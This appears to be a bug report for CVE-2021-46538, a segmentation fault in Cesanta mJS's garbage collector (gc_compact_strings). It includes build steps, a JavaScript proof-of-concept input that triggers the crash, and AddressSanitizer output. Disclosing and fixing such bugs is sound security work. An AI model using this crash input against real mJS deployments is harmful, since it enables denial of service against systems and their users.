Headline
CVE-2021-46538: SEGV src/mjs_gc.c:406 in gc_compact_strings · Issue #216 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via gc_compact_strings at src/mjs_gc.c. This vulnerability can lead to a Denial of Service (DoS).
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test case
(function () { ((function f(a) { if (a > 0) { if ('#1.1: -0 - -0 === 0. Actual: '((JSON.stringify(gc('#1.1: -0 - -0 === 0. Ac\ual: '))) !== (gc('#1.1: -0 - -0 === 0. Actual: '))('#1.1: -0 - -0 === 0. Actual: ' !== f(a - 1)))) { f(a - 1) } } })(6)) })()
Execution steps & Output
$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==50070==ERROR: AddressSanitizer: SEGV on unknown address 0x3a60d0000001 (pc 0x5588da606950 bp 0x615000000080 sp 0x7ffef6409930 T0) ==50070==The signal is caused by a READ memory access. #0 0x5588da60694f in gc_compact_strings src/mjs_gc.c:406 #1 0x5588da6087d7 in mjs_gc src/mjs_gc.c:500 #2 0x5588da608ec2 in maybe_gc src/mjs_gc.c:446 #3 0x5588da5d2d67 in mjs_execute src/mjs_exec.c:578 #4 0x5588da5e0a05 in mjs_exec_internal src/mjs_exec.c:1073 #5 0x5588da5e0a05 in mjs_exec_file src/mjs_exec.c:1096 #6 0x5588da59d909 in main src/mjs_main.c:47 #7 0x7fe819cbcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x5588da59e449 in _start (/usr/local/bin/mjs+0xe449)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_gc.c:406 in gc_compact_strings ==50070==ABORTING
Credits: Found by OWL337 team.